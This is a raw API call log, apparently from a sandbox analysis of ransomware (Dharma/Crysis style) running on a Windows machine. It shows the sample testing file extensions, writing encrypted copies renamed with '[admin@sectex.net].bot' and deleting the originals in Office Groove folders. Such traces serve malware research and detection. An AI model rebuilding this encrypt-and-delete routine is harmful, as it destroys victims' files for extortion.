	[0170.398] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0170.398] lstrlenW (lpString=".xlsx") returned 5
	[0170.398] lstrcmpiW (lpString1=".xlsx", lpString2="t.fdt") returned -1
	[0170.398] lstrlenW (lpString=".ppt") returned 4
	[0170.398] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0170.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.398] lstrlenW (lpString=".zip") returned 4
	[0170.398] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0170.398] lstrlenW (lpString=".rar") returned 4
	[0170.398] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0170.398] lstrlenW (lpString=".bz2") returned 4
	[0170.398] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0170.398] lstrlenW (lpString=".7z") returned 3
	[0170.398] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0170.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.398] lstrlenW (lpString=".dbf") returned 4
	[0170.398] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0170.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.398] lstrlenW (lpString=".1cd") returned 4
	[0170.398] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0170.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt") returned 114
	[0170.398] lstrlenW (lpString=".jpg") returned 4
	[0170.398] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0170.398] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0170.399] lstrlenW (lpString="VIEW.ICO") returned 8
	[0170.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0170.399] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=318) returned 1
	[0170.399] CloseHandle (hObject=0x3e8) returned 1
	[0170.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico")) returned 0x20
	[0170.400] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0170.400] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.400] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.403] GetLastError () returned 0x0
	[0170.403] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x13e, lpOverlapped=0x0) returned 1
	[0170.404] WriteFile (in: hFile=0x350, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x140, lpOverlapped=0x0) returned 1
	[0170.405] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.405] WriteFile (in: hFile=0x350, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0170.405] SetEndOfFile (hFile=0x350) returned 1
	[0170.405] CloseHandle (hObject=0x350) returned 1
	[0170.405] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.405] SetEndOfFile (hFile=0x3e8) returned 1
	[0170.407] CloseHandle (hObject=0x3e8) returned 1
	[0170.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.408] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico")) returned 1
	[0170.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.422] lstrlenW (lpString=".doc") returned 4
	[0170.422] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0170.422] lstrlenW (lpString=".docx") returned 5
	[0170.422] lstrcmpiW (lpString1=".docx", lpString2="W.ICO") returned -1
	[0170.422] lstrlenW (lpString=".pdf") returned 4
	[0170.422] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0170.422] lstrlenW (lpString=".xls") returned 4
	[0170.422] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0170.422] lstrlenW (lpString=".xlsx") returned 5
	[0170.422] lstrcmpiW (lpString1=".xlsx", lpString2="W.ICO") returned -1
	[0170.422] lstrlenW (lpString=".ppt") returned 4
	[0170.422] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0170.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.422] lstrlenW (lpString=".zip") returned 4
	[0170.422] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0170.422] lstrlenW (lpString=".rar") returned 4
	[0170.422] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0170.422] lstrlenW (lpString=".bz2") returned 4
	[0170.422] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0170.422] lstrlenW (lpString=".7z") returned 3
	[0170.422] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0170.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.422] lstrlenW (lpString=".dbf") returned 4
	[0170.422] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0170.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.422] lstrlenW (lpString=".1cd") returned 4
	[0170.422] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0170.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.422] lstrlenW (lpString=".jpg") returned 4
	[0170.422] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0170.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.423] lstrlenW (lpString=".doc") returned 4
	[0170.423] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0170.423] lstrlenW (lpString=".docx") returned 5
	[0170.423] lstrcmpiW (lpString1=".docx", lpString2="W.ICO") returned -1
	[0170.423] lstrlenW (lpString=".pdf") returned 4
	[0170.423] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0170.423] lstrlenW (lpString=".xls") returned 4
	[0170.423] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0170.423] lstrlenW (lpString=".xlsx") returned 5
	[0170.423] lstrcmpiW (lpString1=".xlsx", lpString2="W.ICO") returned -1
	[0170.423] lstrlenW (lpString=".ppt") returned 4
	[0170.423] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0170.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.423] lstrlenW (lpString=".zip") returned 4
	[0170.423] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0170.423] lstrlenW (lpString=".rar") returned 4
	[0170.423] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0170.423] lstrlenW (lpString=".bz2") returned 4
	[0170.423] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0170.423] lstrlenW (lpString=".7z") returned 3
	[0170.423] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0170.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.423] lstrlenW (lpString=".dbf") returned 4
	[0170.423] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0170.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.423] lstrlenW (lpString=".1cd") returned 4
	[0170.423] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0170.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 91
	[0170.423] lstrlenW (lpString=".jpg") returned 4
	[0170.423] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0170.424] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0170.424] lstrlenW (lpString="FORM.ICO") returned 8
	[0170.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0170.425] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=318) returned 1
	[0170.425] CloseHandle (hObject=0x3e8) returned 1
	[0170.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico")) returned 0x20
	[0170.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0170.426] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.426] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370
	[0171.073] GetLastError () returned 0x0
	[0171.073] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x13e, lpOverlapped=0x0) returned 1
	[0171.074] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x140, lpOverlapped=0x0) returned 1
	[0171.076] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.076] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0171.076] SetEndOfFile (hFile=0x370) returned 1
	[0171.076] CloseHandle (hObject=0x370) returned 1
	[0171.076] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.076] SetEndOfFile (hFile=0x3e8) returned 1
	[0171.078] CloseHandle (hObject=0x3e8) returned 1
	[0171.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.079] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico")) returned 1
	[0171.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.079] lstrlenW (lpString=".doc") returned 4
	[0171.079] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.079] lstrlenW (lpString=".docx") returned 5
	[0171.079] lstrcmpiW (lpString1=".docx", lpString2="M.ICO") returned -1
	[0171.079] lstrlenW (lpString=".pdf") returned 4
	[0171.079] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.079] lstrlenW (lpString=".xls") returned 4
	[0171.080] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.080] lstrlenW (lpString=".xlsx") returned 5
	[0171.080] lstrcmpiW (lpString1=".xlsx", lpString2="M.ICO") returned -1
	[0171.080] lstrlenW (lpString=".ppt") returned 4
	[0171.080] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.080] lstrlenW (lpString=".zip") returned 4
	[0171.080] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.080] lstrlenW (lpString=".rar") returned 4
	[0171.080] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.080] lstrlenW (lpString=".bz2") returned 4
	[0171.080] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.080] lstrlenW (lpString=".7z") returned 3
	[0171.080] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.080] lstrlenW (lpString=".dbf") returned 4
	[0171.080] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.080] lstrlenW (lpString=".1cd") returned 4
	[0171.080] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.080] lstrlenW (lpString=".jpg") returned 4
	[0171.080] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.080] lstrlenW (lpString=".doc") returned 4
	[0171.080] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.080] lstrlenW (lpString=".docx") returned 5
	[0171.080] lstrcmpiW (lpString1=".docx", lpString2="M.ICO") returned -1
	[0171.080] lstrlenW (lpString=".pdf") returned 4
	[0171.080] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.080] lstrlenW (lpString=".xls") returned 4
	[0171.080] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.080] lstrlenW (lpString=".xlsx") returned 5
	[0171.081] lstrcmpiW (lpString1=".xlsx", lpString2="M.ICO") returned -1
	[0171.081] lstrlenW (lpString=".ppt") returned 4
	[0171.081] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.081] lstrlenW (lpString=".zip") returned 4
	[0171.081] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.081] lstrlenW (lpString=".rar") returned 4
	[0171.081] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.081] lstrlenW (lpString=".bz2") returned 4
	[0171.081] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.081] lstrlenW (lpString=".7z") returned 3
	[0171.081] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.081] lstrlenW (lpString=".dbf") returned 4
	[0171.081] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.081] lstrlenW (lpString=".1cd") returned 4
	[0171.081] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO") returned 91
	[0171.081] lstrlenW (lpString=".jpg") returned 4
	[0171.081] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.081] lstrcmpiW (lpString1=".ico", lpString2=".bot") returned 1
	[0171.081] lstrlenW (lpString="gfserrortogroove.ico") returned 20
	[0171.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrortogroove.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0171.084] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1718) returned 1
	[0171.084] CloseHandle (hObject=0x3e8) returned 1
	[0171.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrortogroove.ico")) returned 0x20
	[0171.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrortogroove.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrortogroove.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0171.085] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.085] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrortogroove.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370
	[0171.085] GetLastError () returned 0x0
	[0171.085] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x6b6, lpOverlapped=0x0) returned 1
	[0171.127] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x6c0, lpOverlapped=0x0) returned 1
	[0171.128] ReadFile (in: hFile=0x3e8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.128] WriteFile (in: hFile=0x370, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0171.128] SetEndOfFile (hFile=0x370) returned 1
	[0171.129] CloseHandle (hObject=0x370) returned 1
	[0171.129] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.129] SetEndOfFile (hFile=0x3e8) returned 1
	[0171.131] CloseHandle (hObject=0x3e8) returned 1
	[0171.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.131] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\gfserrortogroove.ico")) returned 1
	[0171.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.132] lstrlenW (lpString=".doc") returned 4
	[0171.132] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1
	[0171.132] lstrlenW (lpString=".docx") returned 5
	[0171.132] lstrcmpiW (lpString1=".docx", lpString2="e.ico") returned -1
	[0171.132] lstrlenW (lpString=".pdf") returned 4
	[0171.132] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1
	[0171.132] lstrlenW (lpString=".xls") returned 4
	[0171.132] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1
	[0171.132] lstrlenW (lpString=".xlsx") returned 5
	[0171.132] lstrcmpiW (lpString1=".xlsx", lpString2="e.ico") returned -1
	[0171.132] lstrlenW (lpString=".ppt") returned 4
	[0171.132] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1
	[0171.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.132] lstrlenW (lpString=".zip") returned 4
	[0171.132] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1
	[0171.132] lstrlenW (lpString=".rar") returned 4
	[0171.132] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1
	[0171.132] lstrlenW (lpString=".bz2") returned 4
	[0171.132] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1
	[0171.132] lstrlenW (lpString=".7z") returned 3
	[0171.132] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1
	[0171.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\gfserrortogroove.ico") returned 80
	[0171.133] lstrlenW (lpString=".dbf") returned 4
